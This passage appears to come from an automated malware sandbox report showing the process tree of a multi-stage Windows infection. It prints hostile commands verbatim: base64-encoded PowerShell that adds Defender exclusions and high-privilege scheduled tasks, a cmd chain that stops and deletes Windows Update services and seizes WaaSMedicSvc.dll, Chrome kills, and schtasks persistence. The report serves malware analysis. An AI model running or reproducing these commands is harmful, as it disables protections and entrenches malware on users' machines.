ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwARwBvAG8AZwBsAGUAXABDAGgAcgBvAG0AZQBcAHUAcABkAGEAdABlAHIALgBlAHgAZQAnACAALQBGAG8AcgBjAGUAIAA8ACMAZQBzACMAPgA7ACAAUwB0AGEAcgB0AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgADwAIwB3AGwAZQAjAD4AIAAtAFQAYQBzAGsATgBhAG0AZQAgACcARwBvAG8AZwBsAGUAVQBwAGQAYQB0AGUAVABhAHMAawBNAGEAYwBoAGkAbgBlAFEAQwAnADsA"
                                                                    8⤵
                                                                    • Drops file in Program Files directory
                                                                    PID:2324
                                                              • C:\Users\Admin\AppData\Local\Temp\HIJB7.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\HIJB7.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                PID:3136
                                                                • C:\Windows\System32\conhost.exe
                                                                  "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\HIJB7.exe"
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  PID:2908
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAcgBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG8AYwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB4AGEAaQBtACMAPgA="
                                                                    8⤵
                                                                      PID:2676
                                                                      • C:\Windows\System32\Conhost.exe
                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        9⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:1140
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                                                      8⤵
                                                                        PID:2548
                                                                        • C:\Windows\system32\sc.exe
                                                                          sc stop UsoSvc
                                                                          9⤵
                                                                          • Launches sc.exe
                                                                          PID:2996
                                                                        • C:\Windows\system32\sc.exe
                                                                          sc stop WaaSMedicSvc
                                                                          9⤵
                                                                          • Launches sc.exe
                                                                          PID:988
                                                                        • C:\Windows\system32\sc.exe
                                                                          sc stop wuauserv
                                                                          9⤵
                                                                          • Launches sc.exe
                                                                          PID:3468
                                                                        • C:\Windows\system32\sc.exe
                                                                          sc stop bits
                                                                          9⤵
                                                                          • Launches sc.exe
                                                                          PID:2168
                                                                        • C:\Windows\system32\sc.exe
                                                                          sc stop dosvc
                                                                          9⤵
                                                                          • Launches sc.exe
                                                                          PID:4736
                                                                        • C:\Windows\system32\reg.exe
                                                                          reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                                                          9⤵
                                                                          • Modifies registry key
                                                                          PID:848
                                                                        • C:\Windows\system32\reg.exe
                                                                          reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                                                          9⤵
                                                                          • Modifies registry key
                                                                          PID:216
                                                                        • C:\Windows\system32\reg.exe
                                                                          reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                                                          9⤵
                                                                          • Modifies registry key
                                                                          PID:636
                                                                        • C:\Windows\system32\reg.exe
                                                                          reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                                                          9⤵
                                                                          • Modifies registry key
                                                                          PID:2304
                                                                        • C:\Windows\system32\reg.exe
                                                                          reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                                                          9⤵
                                                                          • Modifies registry key
                                                                          PID:2904
                                                                        • C:\Windows\system32\takeown.exe
                                                                          takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                                                          9⤵
                                                                          • Possible privilege escalation attempt
                                                                          • Modifies file permissions
                                                                          PID:776
                                                                        • C:\Windows\system32\icacls.exe
                                                                          icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                                                          9⤵
                                                                          • Possible privilege escalation attempt
                                                                          • Modifies file permissions
                                                                          PID:4308
                                                                        • C:\Windows\system32\reg.exe
                                                                          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                                                                          9⤵
                                                                          • Modifies registry key
                                                                          PID:1948
                                                                        • C:\Windows\system32\reg.exe
                                                                          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                                                          9⤵
                                                                          • Modifies registry key
                                                                          PID:1096
                                                                        • C:\Windows\system32\reg.exe
                                                                          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                                                          9⤵
                                                                          • Modifies registry key
                                                                          PID:3660
                                                                        • C:\Windows\system32\reg.exe
                                                                          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                                                          9⤵
                                                                          • Modifies registry key
                                                                          PID:2944
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                                                          9⤵
                                                                            PID:1400
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                                                            9⤵
                                                                              PID:932
                                                                            • C:\Windows\system32\schtasks.exe
                                                                              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                                                              9⤵
                                                                                PID:4336
                                                                              • C:\Windows\system32\schtasks.exe
                                                                                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                                                                9⤵
                                                                                  PID:948
                                                                                • C:\Windows\system32\schtasks.exe
                                                                                  SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                                                                  9⤵
                                                                                    PID:3152
                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                                                                    9⤵
                                                                                      PID:932
                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                      SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                                                                      9⤵
                                                                                        PID:1916
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAagB3ACMAPgAgAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnACIAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACIAJwApACAAPAAjAHkAdgB5AGcAIwA+ACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0AEwAbwBnAE8AbgApACAAPAAjAGMAdwAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAGEAYQAjAD4AIAAtAFQAYQBzAGsATgBhAG0AZQAgACcARwBvAG8AZwBsAGUAVQBwAGQAYQB0AGUAVABhAHMAawBNAGEAYwBoAGkAbgBlAFEAQwAnACAAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAegBrAGsAIwA+ADsAIABDAG8AcAB5AC0ASQB0AGUAbQAgACcAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABIAEkASgBCADcALgBlAHgAZQAnACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAnAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARwBvAG8AZwBsAGUAXABDAGgAcgBvAG0AZQBcAHUAcABkAGEAdABlAHIALgBlAHgAZQAnACAALQBGAG8AcgBjAGUAIAA8ACMAZABpAG8AaQAjAD4AOwAgAFMAdABhAHIAdAAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAA8ACMAZQBwACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAOwA="
                                                                                      8⤵
                                                                                        PID:960
                                                                                  • C:\Users\Admin\AppData\Local\Temp\0F7DJ.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\0F7DJ.exe"
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    • Checks computer location settings
                                                                                    PID:3416
                                                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                                                      "C:\Windows\System32\msiexec.exe" /y .\BRXlVN.Zd
                                                                                      7⤵
                                                                                      • Loads dropped DLL
                                                                                      PID:4392
                                                                                  • C:\Users\Admin\AppData\Local\Temp\D399M1F691226D6.exe
                                                                                    https://iplogger.org/1OAvJ
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    • Modifies Internet Explorer settings
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:4124
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 328 -s 704
                                                                                    6⤵
                                                                                    • Program crash
                                                                                    PID:1632
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 328 -s 736
                                                                                    6⤵
                                                                                    • Program crash
                                                                                    PID:1488
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 328 -s 892
                                                                                    6⤵
                                                                                    • Program crash
                                                                                    PID:2500
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 328 -s 896
                                                                                    6⤵
                                                                                    • Program crash
                                                                                    PID:4284
                                                                                  • C:\Users\Admin\AppData\Local\Temp\D9D20IFKDJGI77J.exe
                                                                                    <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>509 Bandwidth Limit Exceeded</TITLE> </HEAD><BODY> <H1>Bandwidth Limit Exceeded</H1> The server is temporarily unable to service your request due to the site owner reaching his/her bandwidth limit. Please try again later. </BODY></HTML>
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:2496
                                                                                  • C:\Users\Admin\AppData\Local\Temp\24KL478JE5HF575.exe
                                                                                    6⤵
                                                                                      PID:4284
                                                                                  • C:\Users\Admin\AppData\Local\Temp\liyong.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\liyong.exe"
                                                                                    5⤵
                                                                                    • Executes dropped EXE
                                                                                    • Checks computer location settings
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:3632
                                                                                    • C:\Users\Admin\AppData\Local\Temp\liyong.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\liyong.exe" help
                                                                                      6⤵
                                                                                        PID:412
                                                                                    • C:\Users\Admin\AppData\Local\Temp\rtst1077.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\rtst1077.exe"
                                                                                      5⤵
                                                                                        PID:5036
                                                                                        • C:\Windows\system32\WerFault.exe
                                                                                          C:\Windows\system32\WerFault.exe -u -p 5036 -s 900
                                                                                          6⤵
                                                                                          • Program crash
                                                                                          PID:5032
                                                                                      • C:\Users\Admin\AppData\Local\Temp\handselfdiy_8.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\handselfdiy_8.exe"
                                                                                        5⤵
                                                                                          PID:4072
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            cmd.exe /c taskkill /f /im chrome.exe
                                                                                            6⤵
                                                                                              PID:1736
                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                taskkill /f /im chrome.exe
                                                                                                7⤵
                                                                                                • Kills process with taskkill
                                                                                                PID:4168
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                              6⤵
                                                                                                PID:4852
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd41244f50,0x7ffd41244f60,0x7ffd41244f70
                                                                                                  7⤵
                                                                                                    PID:1636
                                                                                              • C:\Users\Admin\AppData\Local\Temp\inst002.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\inst002.exe"
                                                                                                5⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:2592
                                                                                              • C:\Users\Admin\AppData\Local\Temp\search_hyperfs_216.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_216.exe"
                                                                                                5⤵
                                                                                                • Executes dropped EXE
                                                                                                • Checks computer location settings
                                                                                                PID:4576
                                                                                                • C:\Windows\SysWOW64\msiexec.exe
                                                                                                  "C:\Windows\System32\msiexec.exe" -y .\B_~R3N.4n
                                                                                                  6⤵
                                                                                                  • Loads dropped DLL
                                                                                                  PID:3320
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe"
                                                                                                5⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                PID:3520
                                                                                                • C:\Users\Admin\AppData\Local\Temp\dTM6LzMpsfjjW\Application373.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\dTM6LzMpsfjjW\Application373.exe
                                                                                                  6⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Loads dropped DLL
                                                                                                  • Adds Run key to start application
                                                                                                  PID:5036
                                                                                                  • C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" "--uOyLnaD1"
                                                                                                    7⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Checks computer location settings
                                                                                                    • Loads dropped DLL
                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                    PID:3764
                                                                                                    • C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
                                                                                                      C:\Users\Admin\AppData\Roaming\Routes\Routes.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Routes\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Routes\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Routes\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Routes\User Data" --annotation=plat=Win64 --annotation=prod=Routes --annotation=ver=0.0.13 --initial-client-data=0x220,0x224,0x228,0xd8,0x22c,0x7ffd46e3dec0,0x7ffd46e3ded0,0x7ffd46e3dee0
                                                                                                      8⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Loads dropped DLL
                                                                                                      PID:4188
                                                                                                      • C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
                                                                                                        C:\Users\Admin\AppData\Roaming\Routes\Routes.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Routes\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Routes\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Routes --annotation=ver=0.0.13 --initial-client-data=0x148,0x14c,0x150,0x124,0x154,0x7ff6a33f9e70,0x7ff6a33f9e80,0x7ff6a33f9e90
                                                                                                        9⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        PID:2904
                                                                                                    • C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1596,2879432380570864779,9151905981805025403,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3764_2035613163" --mojo-platform-channel-handle=1824 /prefetch:8
                                                                                                      8⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Loads dropped DLL
                                                                                                      • Modifies system certificate store
                                                                                                      PID:3920
                                                                                                    • C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1596,2879432380570864779,9151905981805025403,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3764_2035613163" --mojo-platform-channel-handle=2132 /prefetch:8
                                                                                                      8⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Loads dropped DLL
                                                                                                      PID:1948
                                                                                                    • C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=gpu-process --field-trial-handle=1596,2879432380570864779,9151905981805025403,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3764_2035613163" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1612 /prefetch:2
                                                                                                      8⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Loads dropped DLL
                                                                                                      • Modifies registry class
                                                                                                      PID:4792
                                                                                                    • C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Routes\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1596,2879432380570864779,9151905981805025403,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3764_2035613163" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2588 /prefetch:1
                                                                                                      8⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Checks computer location settings
                                                                                                      • Loads dropped DLL
                                                                                                      PID:4748
                                                                                                    • C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Routes\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1596,2879432380570864779,9151905981805025403,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3764_2035613163" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2612 /prefetch:1
                                                                                                      8⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Checks computer location settings
                                                                                                      • Loads dropped DLL
                                                                                                      PID:4336
                                                                                                    • C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=gpu-process --field-trial-handle=1596,2879432380570864779,9151905981805025403,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3764_2035613163" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3336 /prefetch:2
                                                                                                      8⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Loads dropped DLL
                                                                                                      • Modifies registry class
                                                                                                      PID:4888
                                                                                                    • C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1596,2879432380570864779,9151905981805025403,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3764_2035613163" --mojo-platform-channel-handle=2028 /prefetch:8
                                                                                                      8⤵
                                                                                                        PID:3508
                                                                                                      • C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
                                                                                                        "C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1596,2879432380570864779,9151905981805025403,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3764_2035613163" --mojo-platform-channel-handle=4040 /prefetch:8
                                                                                                        8⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        PID:4372
                                                                                                      • C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
                                                                                                        "C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1596,2879432380570864779,9151905981805025403,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3764_2035613163" --mojo-platform-channel-handle=4032 /prefetch:8
                                                                                                        8⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        PID:3684
                                                                                                • C:\Users\Admin\AppData\Local\Temp\anytime6.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\anytime6.exe"
                                                                                                  5⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Checks computer location settings
                                                                                                  PID:1608
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                    6⤵
                                                                                                      PID:4988
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Chrome3.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Chrome3.exe"
                                                                                                        7⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:4276
                                                                                                        • C:\Windows\System32\conhost.exe
                                                                                                          "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome3.exe"
                                                                                                          8⤵
                                                                                                            PID:1448
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                              9⤵
                                                                                                                PID:4500
                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                  schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                  10⤵
                                                                                                                  • Creates scheduled task(s)
                                                                                                                  PID:1512
                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                "cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                9⤵
                                                                                                                  PID:2868
                                                                                                                  • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                                                    C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                                                    10⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:2372
                                                                                                                    • C:\Windows\System32\conhost.exe
                                                                                                                      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                      11⤵
